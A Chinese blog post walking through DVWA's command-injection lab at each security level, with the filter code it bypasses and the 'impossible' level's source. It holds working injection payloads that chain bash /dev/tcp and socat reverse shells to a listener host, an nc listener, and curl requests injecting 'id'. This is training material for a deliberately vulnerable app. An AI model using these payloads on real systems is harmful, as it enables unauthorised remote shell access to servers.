命令注入反弹shell

ccOCONuTT

已于 2023-05-23 16:42:48 修改

阅读量398

点赞数 1

文章标签： linux bash 反弹shell 命令注入 dvwa

于 2023-05-23 16:13:29 首次发布

原文链接：www.baidu.com

版权

文章详细介绍了DVWA（DamnVulnerableWebApplication）中不同安全级别下命令注入漏洞的利用方法，包括利用`&&`和`||`在Linux环境中执行命令，以及如何在高安全级别下绕过过滤策略。还提到了工具如nc和socat在创建反向Shell中的应用，并给出了curl命令的示例来演示如何利用这些漏洞。

摘要由CSDN通过智能技术生成

AWVS Command Injection

Linux中 && - 前一条命令成功再执行后一条命令
|| - 前一条命令失败再执行后一条命令

请求-例（high）
在这里插入图片描述

Low
没有做限制。

8.8.8.8;/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
;/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"

长时间后浏览器会显示超时。
在这里插入图片描述
（rlwrap nc -lvnp 9999）
python3 -c “import pty;pty.spawn(‘/bin/bash’)”

如果nc及时退出，浏览器回显：

curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \
-d 'ip=|id&Submit=Submit' \
-H "Cookie: security=low;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl"  \
-s | grep uid

curl参数说明在底部↓

https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/

在这里插入图片描述

Medium
“&&”、";"被替换为空。没有过滤单个的“&”。

在Linux中，&符号表示将命令放到后台执行。
会输出作业编号、进程 ID、作业状态和启动作业的命令
（https://linuxize.com/post/how-to-run-linux-commands-in-background/）
|符号表示将前一个命令的输出作为后一个命令的输入，就是常说的管道符。不论管道前命令的输出如何，管道之后的命令都会尝试运行。

例如
在这里插入图片描述

8.8.8.8&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&
&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&
|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&

High

有以下过滤，第三个"|"后面多了一个空格，和medium类似，区别是增加了更多的过滤。

$substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

使用socat 进行远程连接

socat是Linux下的一个多功能的网络工具，名字来由是「Socket CAT」。它的功能与Netcat类似，可以看做是Netcat的加强版。【https://cybr.com/ethical-hacking-archives/create-a-reverse-shell-with-socat-dvwa-os-command-injections/】
socat是一种基于命令行的实用程序，它建立两个双向字节流并在它们之间传输数据。(Manual）
PHP trim() — 去除字符串首尾处的空白字符（或者其他字符）

8.8.8.8|socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint
|socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint

https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/

curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \
-d 'ip=|id&Submit=Submit' \
-H "Cookie: security=high;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl"  \
-s | grep uid
                <pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)

Impossible
😦:(

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $target = $_REQUEST[ 'ip' ];
    $target = stripslashes( $target );

    // Split the IP into 4 octects
    $octet = explode( ".", $target );

    // Check IF each octet is an integer
    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
        // If all 4 octets are int's put the IP back together.
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping  ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping  -c 4 ' . $target );
        }

        // Feedback for the end user
        echo "<pre>{$cmd}</pre>";
    }
    else {
        // Ops. Let the user name theres a mistake
        echo '<pre>ERROR: You have entered an invalid IP.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

curl参数说明(Manual）

-X, --request <method>
              -X HEAD will not suffice. You need to use the -I, --head option.
              The method string you set with -X, --request will be used for all requests, which if you for example use -L, --location may cause unintended side-effects when curl does not
              If -X, --request is provided several times, the last set value will be used.
               curl -X "DELETE" https://example.com
               curl -X NLST ftp://example.com/



-d, --data <data>
              --data-raw is almost the same but does not have a special interpretation of the @ character. To post data purely binary, you should instead use the --data-binary option. To
              URL-encode the value of a form field you may use --data-urlencode.
              If any of these options is used more than once on the same command line, the data pieces specified will be merged with a separating &-symbol. Thus, using '-d name=daniel -d
              named 'foobar' would thus be done with -d, --data @foobar. When -d, --data is told to read from a file like that, carriage returns and newlines will be stripped out. If you
              do not want the @ character to have a special interpretation use --data-raw instead.
              -d, --data can be used several times in a command line
               curl -d "name=curl" https://example.com
               curl -d "name=curl" -d "tool=cmdline" https://example.com
               curl -d @filename https://example.com
              See also --data-binary, --data-urlencode and --data-raw. This option is mutually exclusive to -F, --form and -I, --head and -T, --upload-file.

-H, --header <header/@file>
              without  knowing  perfectly well what you are doing. Remove an internal header by giving a replacement without content on the right side of the colon, as in: -H "Host:". If
              you send the custom header with no-value then its header must be terminated with a semicolon, such as -H "X-Custom-Header;" to send "X-Custom-Header:".
              -H, --header can be used several times in a command line
               curl -H "X-First-Name: Joe" https://example.com
               curl -H "User-Agent: yes-please/2000" https://example.com
               curl -H "Host:" https://example.com
               curl -H @headers.txt https://example.com
              HTTP/0.9 is a completely headerless response and therefore you can also connect with this to non-HTTP servers and still get a response since curl will simply  transparently
              The headers this option sets can be overridden with -H, --header as usual.
              (HTTP) Extra header to include in the request when sending HTTP to a proxy. You may specify any number of extra headers. This is the equivalent option to -H,  --header  but
              (HTTP) Sends the "Referrer Page" information to the HTTP server. This can also be set with the -H, --header flag of course. When used with -L,  --location  you  can  append
              See also -A, --user-agent and -H, --header.
              with the -H, --header or the --proxy-header options.
              See also -H, --header and --proxy-header.

-s, --silent
              Use -S, --show-error in addition to this option to disable progress meter but still show error messages.
              Providing -s, --silent multiple times has no extra effect.  Disable it again with --no-silent.
               curl -s https://example.com
              See also -v, --verbose, --stderr and --no-progress-meter.